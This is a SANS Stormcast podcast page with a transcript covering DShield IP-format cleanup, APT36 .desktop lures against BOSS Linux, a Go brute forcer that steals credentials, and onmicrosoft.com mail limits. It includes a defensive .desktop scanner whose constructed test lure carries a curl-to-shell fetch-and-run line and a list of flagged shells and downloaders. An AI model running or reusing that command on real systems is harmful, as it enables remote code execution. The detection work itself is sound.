SANS Stormcast Monday, August 25th, 2025: IP Cleanup; Linux Desktop Attacks; Malicious Go SSH Brute Forcer; Onmicrosoft Domain Restrictions
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9584.mp3

My Next Class
Application Security: Securing Web Apps, APIs, and Microservices | Las Vegas | Sep 22nd - Sep 27th 2025 |
Application Security: Securing Web Apps, APIs, and Microservices | Denver | Oct 4th - Oct 9th 2025 |
The end of an era: Properly formatted IP addresses in all of our data.
When DShield was initially designed, IP addresses were stored “zero padded” (every octet padded with leading zeros to a fixed width), an unfortunate choice. As of this week, the data feeds should no longer be zero padded and use plain dotted-decimal notation instead.
https://isc.sans.edu/diary/The%20end%20of%20an%20era%3A%20Properly%20formated%20IP%20addresses%20in%20all%20of%20our%20data./32228
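The normalizer below is an added example, not DShield code. It accepts both the legacy zero-padded layout and the new dotted-decimal one, rejects malformed lines instead of dropping them silently, and shows why the old layout was worse than merely ugly: C-style inet_aton() reads an octet with a leading zero as octal, so "010.0.0.1" turns into 8.0.0.1 in any consumer that handed a legacy feed line to it unchanged. It assumes the legacy format padded each octet with leading zeros; the sample lines are constructed, not real feed data.

```python
"""Normalize IPv4 addresses from zero-padded and dotted-decimal feeds.

Added example; not DShield code. Assumes the legacy layout pads every
octet with leading zeros (e.g. 010.000.000.001).
"""
import re
import socket

# Constructed sample lines (not real feed data): two legacy zero-padded
# lines, one new dotted-decimal line, one mixed line of the kind seen
# mid-transition, and one junk line with an out-of-range octet.
SAMPLE_LINES = [
    "010.000.000.001",
    "192.168.001.010",
    "192.168.1.10",
    "010.0.0.1",
    "999.001.001.001",
]

_IPV4_SHAPE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def normalize_ipv4(text):
    """Return the canonical dotted-decimal form of an IPv4 string that may
    carry leading zeros. Every octet is read as base 10, never as octal, so
    "010" is ten, which is what the zero-padding convention meant.
    Raises ValueError for anything that is not four octets in 0..255."""
    s = text.strip()
    if not _IPV4_SHAPE.match(s):
        raise ValueError("not a dotted IPv4 address: %r" % text)
    octets = [int(o, 10) for o in s.split(".")]
    if any(o > 255 for o in octets):
        raise ValueError("octet out of range: %r" % text)
    return ".".join(str(o) for o in octets)


def octal_reading(text):
    """What a BSD/glibc-style inet_aton() makes of the same string: an octet
    with a leading zero is parsed as octal ("010" -> 8). Returned in
    dotted-decimal so it can be compared with normalize_ipv4()."""
    return socket.inet_ntoa(socket.inet_aton(text))


def normalize_feed(lines):
    """Normalize a whole feed. Returns (normalized, rejected) so bad lines
    are surfaced rather than silently dropped or, worse, misparsed."""
    normalized, rejected = [], []
    for line in lines:
        try:
            normalized.append(normalize_ipv4(line))
        except ValueError:
            rejected.append(line)
    return normalized, rejected


if __name__ == "__main__":
    good, bad = normalize_feed(SAMPLE_LINES)
    for line in SAMPLE_LINES:
        if line in bad:
            print("%-18s rejected" % line)
        else:
            print("%-18s decimal=%-14s inet_aton=%s"
                  % (line, normalize_ipv4(line), octal_reading(line)))
```

Run it and compare the two right-hand columns: the decimal reading and the inet_aton() reading agree only for lines that carry no leading zeros, which is exactly why the feeds are moving to plain dotted-decimal. If you still parse older archives, route them through normalize_ipv4() rather than the C library.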
.desktop files used in an attack against Linux Desktops
A group believed to be Pakistani (Cyfirma attributes it to APT36) is using weaponized .desktop autostart files that pose as PDF documents to target Indian Linux desktops, in particular BOSS Linux systems.
https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/
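The scanner below is an added example, not Cyfirma's tooling and not a sample from their report. It parses the [Desktop Entry] group of a .desktop file and flags the pattern described above: an entry whose Name, Icon or filename says "document" while its Type is Application, whose Exec hands control to a shell or downloader, and which sits in an autostart directory so it runs at every login. The three entries it is fed are constructed here (a normal browser launcher, a legitimate autostart entry, and a made-up lure whose Exec command is invented for illustration).

```python
"""Audit .desktop files for the document-lookalike / autostart pattern.

Added example; not Cyfirma's code. The sample entries are constructed and
the lure's Exec command is invented for illustration.
"""
import configparser
import re
from pathlib import PurePosixPath

# Programs a "document" has no business launching when clicked.
SHELLS_AND_DOWNLOADERS = {
    "sh", "bash", "dash", "zsh", "curl", "wget", "python", "python3",
    "perl", "base64", "nohup",
}

# Name, Icon or filename fragment that suggests a document, not an app.
DOC_HINT = re.compile(r"(?:^|[.\-_/ ])(pdf|docx?|xlsx?|pptx?|odt|txt)\b", re.I)

BENIGN_LAUNCHER = """\
[Desktop Entry]
Type=Application
Name=Firefox
Icon=firefox
Exec=firefox %u
Terminal=false
"""

BENIGN_AUTOSTART = """\
[Desktop Entry]
Type=Application
Name=Nextcloud
Icon=nextcloud
Exec=nextcloud --background
"""

# Constructed lure: name and icon say PDF, Type says Application, and
# Exec hands a command string to bash. The command is made up; it stands
# in for "open a decoy and fetch a payload".
CONSTRUCTED_LURE = """\
[Desktop Entry]
Type=Application
Name=Quarterly Report.pdf
Icon=application-pdf
Exec=bash -c "xdg-open /tmp/decoy.pdf; curl -s http://example.invalid/p | sh"
Terminal=false
"""

# Constructed path -> content map standing in for a directory walk.
SAMPLE_FILES = {
    "/usr/share/applications/firefox.desktop": BENIGN_LAUNCHER,
    "/home/user/.config/autostart/nextcloud.desktop": BENIGN_AUTOSTART,
    "/home/user/.config/autostart/Quarterly Report.pdf.desktop": CONSTRUCTED_LURE,
}


def parse_desktop_entry(content):
    """Return the [Desktop Entry] group as a dict. Keys keep their case and
    %u/%f field codes are left alone (configparser interpolation is off)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(content)
    if "Desktop Entry" not in cp:
        raise ValueError("no [Desktop Entry] group")
    return dict(cp["Desktop Entry"])


def audit_desktop_entry(path, content):
    """Return human-readable findings for one .desktop file."""
    entry = parse_desktop_entry(content)
    p = PurePosixPath(path)
    findings = []

    # Exec: split on shell separators and look at the bare program names,
    # so "bash -c '... | sh'" is caught even inside a quoted command string.
    exec_line = entry.get("Exec", "")
    tokens = re.findall(r"""[^\s;|&"']+""", exec_line)
    launched = {PurePosixPath(t).name for t in tokens} & SHELLS_AND_DOWNLOADERS
    if launched:
        findings.append("Exec invokes %s: %r" % (", ".join(sorted(launched)), exec_line))

    # Lookalike: document-ish label on an Application entry.
    label = "%s %s %s" % (entry.get("Name", ""), entry.get("Icon", ""), p.stem)
    if DOC_HINT.search(label) and entry.get("Type", "") == "Application":
        findings.append("presents as a document but is a Type=Application entry")

    # Persistence: anything under an autostart directory runs at every login.
    if "autostart" in p.parts:
        findings.append("located in an autostart directory, so it runs at every login")
    return findings


def scan(files):
    """files: {path: content}. Returns {path: findings} for entries where an
    Exec or lookalike finding fired; autostart placement alone is context."""
    flagged = {}
    for path, content in files.items():
        findings = audit_desktop_entry(path, content)
        if any(f.startswith(("Exec", "presents")) for f in findings):
            flagged[path] = findings
    return flagged


if __name__ == "__main__":
    for path, findings in scan(SAMPLE_FILES).items():
        print(path)
        for f in findings:
            print("  -", f)
```

To run this against a real host, replace SAMPLE_FILES with the contents of ~/Desktop, ~/.local/share/applications, ~/.config/autostart and /etc/xdg/autostart; the legitimate autostart entry shows why placement alone is not scored, since plenty of benign software lives there.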
Malicious Go Module Disguised as SSH Brute Forcer Exfiltrates Credentials via Telegram
A Go module advertising the ability to quickly brute force SSH passwords against random IP addresses has instead been exfiltrating the credentials of the person running the module to its author via Telegram.
https://socket.dev/blog/malicious-go-module-disguised-as-ssh-brute-forcer-exfiltrates-credentials
Limiting Onmicrosoft Domain Usage for Sending Emails
Microsoft is rate-limiting outbound email that Microsoft 365 tenants send from their default “onmicrosoft.com” domain, phased in by tenant size from December 1st, 2025 with full rollout by June 2026; use your own domain for production mail.
https://techcommunity.microsoft.com/blog/exchange/limiting-onmicrosoft-domain-usage-for-sending-emails/4446167
Application Security: Securing Web Apps, APIs, and Microservices | Dallas | Dec 1st - Dec 6th 2025 |
Application Security: Securing Web Apps, APIs, and Microservices | Orlando | Mar 29th - Apr 3rd 2026 |
Network Monitoring and Threat Detection In-Depth | Amsterdam | Apr 20th - Apr 25th 2026 |
Podcast Transcript
Hello and welcome to the Monday, August 25th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Baltimore, Maryland. This episode is brought to you by the SANS.edu Undergraduate Certificate Program in Applied Cybersecurity.

Well, this weekend I only got a quick update for you about some internal changes to the backend of our Internet Storm Center and DShield websites. We're cleaning up some real old code here. Back when I started 25 or so years ago with collecting the data, it sounded like a great idea back then to sort of zero-pad individual bytes of IP addresses so they all have the same length and are easily sorted. Well, that actually in hindsight turned out to be a real bad idea. It's something that I should have fixed many, many years ago; I'm finally getting around to it. And the main thing that you'll see is in some of the data feeds where we used this zero-padded IP address format, you'll see the more normal dotted decimal format for IP addresses. So that should actually make it easier when it comes to post-processing some of the data. If you still note some of the old format, let me know. It'll take a while for all the sort of legacy data to really be changed over.

Well, sometimes it's interesting how attacks that we are sort of used to from the Windows side are bleeding over to other operating systems. The latest example was documented by Cyfirma. They observed what they believe to be a Pakistani hacker group targeting Indian systems using, well, Linux .desktop files. The target here is in particular Linux BOSS, B-O-S-S. That's a Linux distribution specifically popular in India. Now, .desktop files are not specific to that distribution. You see them often in Linux. They're basically these desktop links, similar to what you have in Windows with .url files, simple text files with essentially a couple of parameters. One of the parameters is what command to launch when you click on the icon that represents this particular file. They pretend this to be a PDF, but what you're actually clicking on then launches an executable that basically takes over the respective victim's system. Given that this is currently more used in targeted attacks, it's not a huge problem at this point. But we do keep seeing attacks like this trickle down to more sort of commodity attacks. This is simple enough to pull off. If attackers figure out this is effective, they'll probably launch similar attacks on a broader scale.

And Kirill Boychenko with socket.dev gives us another reminder as to how careful you have to be when you're running malicious tools. The latest example is a Go module that claims to be an SSH brute forcer. The module is called Random IP SSH Bruteforce. This tool definitely doesn't really have sort of a legitimate use because it's specifically designed to scan random IP addresses. So it's not a legitimate pen testing tool that you could focus on a particular IP address range. The reason Go is often used for tools like this is because of its threading capability, and it's really easy to create very fast scanning tools like this in Go, whether malicious or not. The problem with this tool is, while it does what it's advertising, that it is scanning random IP addresses for usernames and passwords, it's also exfiltrating the user's, the attacker's, credentials to the creator of the tool.

As a Microsoft 365 user, if you're setting up a new tenant, in order to facilitate testing of the new tenant, Microsoft allows you to send email using the onmicrosoft.com domain. Sadly, as are many things, this has been heavily abused in the past. For example, it's been used for spam or phishing because it is associated with Microsoft and is often mistaken for an official Microsoft domain. In order to combat this, Microsoft will now restrict how many emails you may be sending using that particular domain. This is being rolled out sort of in a step-by-step fashion, starting with very small tenants first. By December 1st of this year, Exchange users with fewer than three Exchange seats will be limited, and it will be fully rolled out by June next year, at which point users with more than 10,000 seats will also be affected by the same rate limiting. What you're supposed to do instead of using onmicrosoft.com is using your own domain, which is usually, as a legitimate Microsoft 365 user, what you would prefer over onmicrosoft.com just in order to represent your brand.

Well, and that's it for today. So thanks for listening. Thanks for subscribing, liking and recommending this podcast, and talk to you again tomorrow. Bye.